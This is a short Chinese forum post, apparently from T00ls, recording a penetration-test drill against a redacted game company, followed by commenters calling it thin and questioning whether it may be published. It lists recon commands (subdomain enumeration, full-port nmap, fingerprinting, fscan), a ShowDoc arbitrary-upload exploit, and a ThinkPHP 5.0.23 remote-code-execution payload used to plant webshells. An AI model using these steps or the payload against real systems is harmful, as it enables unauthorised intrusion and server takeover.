Xxx游戏渗透测试实战练习
⦁ 资产搜集
1. 子域名:
使用oneforall挖掘对象所有存活子域名host及ip:python oneforall.py --target xxx.com --alive True run
1. 服务器:
使用nmap对所有服务器的端口进行扫描:nmap -v --open --min-rate 1500 -p - -iL E:\xxx.txt -oN E:\xxx_port.txt
1. web指纹:
使用finger:python3 Finger.py -f /opt/project/xxxt.txt
⦁ 漏洞搜集
1. 指纹poc验证:fscan64.exe -uf E:\渗透项目\....txt -o E:\渗透项目\....txt
⦁ 漏洞利用
1. 对资产120.xx.10进行攻击:81端口发现showdoc网页,存在CNVD-2020-26585,任意上传漏洞
利用已知exp上传shell
蚂剑连接
1. 对资产119.xx.112进行攻击利用已知poc-yaml-thinkphp5023-method-rce:http://119.xx.112/index.php?s=captcha,
_method=__construct&filter[]=system&a=di
上webshell,蚁剑连接
踩帖记录
- T00ls路人甲:感觉你说了些什么,又感觉你什么也没有说?(2022-12-20 14:13:16)
- T00ls路人乙:能不能发点有营养的东西,点进来就看到流水账(2022-12-20 14:35:02)
- T00ls路人丙:你说什么就是什么,连个图都没用, 你说有啥漏洞就有啥漏洞,这帖子就这么铁吗? 发帖前看看总版规,另外这种演习过程让对外发布吗?(2022-12-20 16:54:23)
- T00ls路人丁:没东西发就别发了,发的什么玩意,一天过去了也没见出来解释一下。(2022-12-20 19:57:34)
这是单纯的文字吗
80 字节以内
不支持自定义 Discuz! 代码
文字描述的过程很通俗易懂,看过大致知道是怎么渗透的了
hello world
感觉这样直接把命令敲出来更方便理解,但是如果有图片就更好了